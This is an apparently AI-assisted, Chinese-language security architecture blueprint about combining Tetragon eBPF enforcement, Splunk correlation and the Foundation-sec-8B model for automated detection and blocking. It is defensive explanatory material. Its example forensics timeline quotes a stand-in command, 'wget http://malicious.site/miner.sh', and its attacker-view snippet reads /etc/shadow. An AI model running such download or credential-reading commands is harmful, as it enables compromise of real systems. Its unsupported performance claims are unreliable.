01. 架构总览 (Architecture Overview)
本架构方案提出了一种基于 NIST CSF 2.0 和 MITRE ATT&CK 框架的动态闭环安全模型。核心在于利用 eBPF (Tetragon) 极其深入的内核可见性作为神经末梢,Splunk 作为具备大规模关联分析能力的海马体(记忆中枢),以及 Foundation-sec-8B 大模型作为推理决策的大脑皮层,形成 IDPR (Identify, Detect, Protect, Respond) 的毫秒级响应闭环。
核心价值 (Key Value)
内核级阻断: 摆脱用户态 Hook 被绕过的风险。
语境化分析: LLM 理解攻击上下文,减少误报。
自动闭环: 从感知到处置全自动化。
PERCEPTION (感知/执行)
MEMORY (记忆/关联)
DECISION (决策/推理)
Tetragon (eBPF)
Kernel Hooks & Kprobes
Splunk Enterprise
SIEM & SOAR
Foundation-sec-8B
LLM & RAG
JSON Logs
Alert Context
Generated Policy (Auto-Enforce)
NIST CSF 2.0 & MITRE ATT&CK 映射 (Mapping)
NIST CSF 2.0
核心组件 (Component)
功能实现 (Functionality)
覆盖 MITRE TTPs (示例)
Identify
Splunk Asset DB / eBPF Discovery
实时资产发现、进程树梳理、端口监听基线
T1082 (Sys Info Discovery)
Protect
Tetragon Enforcement
SIGKILL 内核级进程阻断、网络隔离
T1204 (User Execution), T1059 (Command & Scripting)
Detect
Splunk SIEM + Tetragon Tracing
异常系统调用检测、文件完整性监控 (FIM)
T1003 (OS Credential Dumping), T1574 (Hijack Exec Flow)
Respond
Foundation-sec-8B (AI) + SOAR
自动生成阻断策略、生成事件分析报告
D3-DA (Detect Analysis), D3-ER (Response)
Page 1 of 7
Author: Weibo Rao Generated through Gemini Canvas
WHAT 原理与架构
Tetragon 是基于 eBPF (Extended Berkeley Packet Filter) 的安全观测与执行工具。不同于传统的 ptrace 或 LD_PRELOAD,Tetragon 代码运行在内核沙箱 中。
核心机制:
Kprobes/Tracepoints: 挂载到关键内核函数(如 `sys_execve`, `tcp_connect`)。
In-Kernel Filtering: 数据在内核态即完成过滤,极大减少用户态上下文切换开销。
Ring Buffer: 高效向用户态传输事件。
WHY 为何选择 Tetragon
1. 透明性 (Transparency): 攻击者无法感知监控进程的存在,难以绕过(Bypass)。
2. 性能 (Performance): 相比 Auditd,eBPF 对系统性能影响极低 (< 1%),适合高并发生产环境。
3. 主动防御 (Enforcement): 能够在系统调用完成之前 进行拦截。例如,在 `openat` 返回文件句柄前直接发送 `SIGKILL` 终止进程。
HOW TracingPolicy 示例
以下 YAML 定义了一个策略:禁止非 Root 用户读取 `/etc/shadow`。
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: "block-shadow-read"
spec:
kprobes:
- call: "sys_openat"
syscall: true
args:
- index: 1
type: "string"
selectors:
- matchArgs:
- index: 1
operator: "Equal"
values:
- "/etc/shadow"
matchActions:
- action: Sigkill
- action: Override
argError: -13 # EACCES
当匹配到读取 shadow 文件时,直接在内核态杀掉进程。
技术图解:内核态 vs 用户态 (Kernel Space vs User Space)
Kernel Function
sys_openat()
ACTION: SIGKILL
阻断发生,函数未执行
Page 2 of 7
Author: Weibo Rao Generated through Gemini Canvas
数据流水线 (Data Pipeline)
Splunk 在此架构中不仅仅是日志存储,它是上下文关联引擎 。Tetragon 产生的 JSON 日志通过 HEC (HTTP Event Collector) 高速通过管道进入。
Tetragon Agent
Splunk HEC
Indexers
关键配置 (Inputs.conf)
[http://tetragon_json]
disabled = 0
index = linux_kernel
sourcetype = tetragon:events
token = xxxx-xxxx-xxxx-xxxx
SPL (Search Processing Language) 实战
利用 SPL 将内核事件与业务逻辑关联。以下查询用于检测“反弹 Shell”行为:进程启动了 shell,且其父进程是非 shell 进程(如 httpd, java)。
index=linux_kernel sourcetype=tetragon:events
process_exec.binary IN ("/bin/bash", "/bin/sh")
| rename process_exec.parent.binary as parent_bin
| search NOT parent_bin IN ("/bin/bash", "/usr/sbin/sshd")
| stats count, values(process_exec.arguments) as cmd, values(process_pod) as pod by host
| eval risk_score = if(count > 1, 100, 50)
| collect index=risk_summary marker="detect_reverse_shell"
Data Normalization (CIM)
将 Tetragon 的字段映射到 Splunk CIM (Common Information Model)。process_exec.binary -> process_nameprocess_sock.ip -> dest_ip
Adaptive Response
当 `risk_score > 80` 时,Splunk 触发 Alert Action,调用 LLM API 进行二次研判,而非直接告警,减少 Noise。
Performance Metrics
50k
EPS (Events/Sec)
<2s
Indexing Latency
Page 3 of 7
Author: Weibo Rao Generated through Gemini Canvas
模型概览 (Model Profile)
Base Model Llama 3 / Mistral 架构
Parameters 8 Billion (FP16/INT8)
Fine-tuning SecInstruct Dataset (CVE, ATT&CK, Splunk Docs, Tetragon CRDs)
Context 32k Tokens (足够容纳长日志序列)
RAG 机制 (Retrieval-Augmented Generation)
为了防止 AI 幻觉,我们集成了 RAG。模型在决策前,会查询内部知识库:
Vector DB: 存储历史 Incident Report。
Live Context: 查询 Splunk 最近 5 分钟的相关日志。
交互示例:自动研判与策略生成
Input (From Splunk Alert):
Alert: High Privileged File Read
Process: /usr/bin/cat
File: /etc/kubernetes/admin.conf
User: www-data (uid=33)
Parent: nginx worker process
Output (Foundation-sec-8B):
[Analysis]: CRITICAL. Web server user `www-data` attempting to read Kubernetes admin credentials. Highly indicative of remote code execution (RCE) and post-exploitation.
[Action]: Isolate Pod immediately.
[Tetragon Policy Generated]:
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: "block-nginx-k8s-read"
spec:
kprobes:
- call: "sys_openat"
... (matches /etc/kubernetes/*) ...
action: Sigkill
Step 1: Ingestion
接收 Splunk 告警 payload。
Step 2: Reasoning
结合 Threat Intel 进行推理,判断是否误报。
Step 3: Response
生成具体的 YAML 策略或 CLI 命令。
Page 4 of 7
Author: Weibo Rao Generated through Gemini Canvas
场景描述
攻击者利用 Web 应用漏洞 (如 Log4j) 尝试读取 `/etc/shadow` 或 `/root/.ssh/id_rsa`。这是典型的权限提升或凭证窃取尝试。
T0: syscall openat
T+1ms: Tetragon Block
T+50ms: Splunk Logged
T+2s: AI Analysis Complete
Zero Dwell Time
传统架构 vs IDPR 闭环架构
指标 (Metric)
传统 EDR/SIEM 方案
基于 eBPF + AI 方案
提升幅度
检测位置
用户态日志 / 审计日志
内核态 Kprobe/Tracepoint
不可绕过性提升
MTTD (平均检测时间)
分钟级 (依赖日志轮询)
微秒/毫秒级 (事件驱动)
1000x Faster
MTTR (平均响应时间)
小时级 (人工研判+封禁)
秒级 (AI 自动下发策略)
全自动闭环
CPU 开销
5% - 15% (Agent 繁重)
< 1% (eBPF JIT)
资源占用极低
攻击视角 (Attacker View)
$ cat /etc/shadow
Killed
$ whoami
root
$ # 进程被直接杀掉,没有任何回显
$ # 攻击者无法判断是被安全软件拦截还是系统故障
防御视角 (Splunk Log)
Tetragon 记录了完整的调用链:
parent: java (Log4j) -> child: bash -> exec: cat /etc/shadow。
Action: SIGKILL 字段确认威胁已阻断。
Page 5 of 7
Author: Weibo Rao Generated through Gemini Canvas
概念:Ghost Recording (幽灵录制)
在内网部署高交互蜜罐时,攻击者往往会尝试删除 bash history 或禁用 syslog。使用 eBPF,监控逻辑下沉至内核,攻击者在用户态的任何清理痕迹的操作都是徒劳的。
核心能力:
按键记录: 监控 TTY 读写,即使用户使用 SSH 加密,内核也能看到明文输入。
文件还原: 攻击者下载的 Malware 即使被立即删除,Tetragon 也能通过拦截 `write` 系统调用还原文件内容。
Splunk + AI 归因分析
Splunk 收集所有“幽灵数据”,AI 模型进行攻击者画像:
工具指纹: 识别使用的 C2 工具(如 Cobalt Strike, Slyver)。
行为习惯: 输入命令的速度、拼写错误习惯、常用参数。
数据流转图:从内核到取证 (From Kernel to Forensics)
Attacker (SSH Session / TTY)
Linux Kernel (eBPF Hooks: read/write/connect)
Tetragon RingBuf
Splunk Replay
AI Report Gen
# AI 生成的取证摘要 (Forensics Summary)
> Attacker Profile: Script Kiddie using automated tools.
> Timeline:
10:01:05 - Initial Access via SSH (Weak Password)
10:01:10 - `wget http://malicious.site/miner.sh` (File Hash: e3b0c44...)
10:01:15 - `chmod +x miner.sh`
10:01:16 - Execution Blocked by Tetragon (Policy: block-unknown-binary)
> Recommendation: Rotate root credentials, enforce key-based auth.
Page 6 of 7
Author: Weibo Rao Generated through Gemini Canvas
场景三:供应链软件基线漂移检测
在零信任环境中,应用容器启动后的行为应该是确定的。Tetragon 可以实施应用基线 (Application Profiling) 。
检测逻辑:
建立基线: 在测试环境运行应用,Splunk 记录所有合法的 Syscalls 和网络连接。
漂移告警: 生产环境中,一旦出现未在基线中的行为(如 Nginx 突然执行 `connect` 连向公网 IP,或加载未知 `.so` 库),Tetragon 立即标记并阻断。
供应链价值: 即使上游镜像被植入后门,只要后门触发了基线外的行为,就会被捕获。
IDPR 化学反应 (The "Chemical Reaction")
三者的结合产生了 1+1+1 > 3 的效果:
Tetragon 提供了以前无法获得的深层数据(Fuel)。
Splunk 提供了关联这些数据的上下文环境(Engine)。
Foundation-sec-8B 提供了实时处理这些数据的智能(Driver)。
总结:IDPR 闭环优势矩阵
维度
Next-Gen (本架构)
Legacy (传统架构)
数据深度
Syscall, Kernel Function Arguments, Network Socket State
Syslog, WinEventLog, NetFlow (Sampled)
响应速度
Inline Blocking (同步阻断)
Async Response (异步响应,有时间差)
运维成本
LLM 辅助分析,减少 Tier-1 SOC 压力
海量告警疲劳,依赖高级专家人工分析
适应性
基于行为与意图 (Behavioral)
基于特征码与规则 (Signature Based)
"Visibility is the prerequisite for security. Intelligence is the key to efficiency."
-- Next-Gen Security Architecture Blueprint v1.0
Page 7 of 7
Author: Weibo Rao Generated through Gemini Canvas